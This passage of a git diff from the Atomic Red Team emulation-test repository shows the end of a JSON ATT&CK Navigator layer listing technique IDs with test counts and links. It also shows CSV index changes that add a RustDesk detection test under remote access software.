Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e766aaa92c..c0bde51272 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1223,6 +1223,7 @@ command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ec command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell +command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d757c94202..0b09773b66 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -814,6 +814,7 @@ command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ec command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell command-and-control,T1219,Remote Access 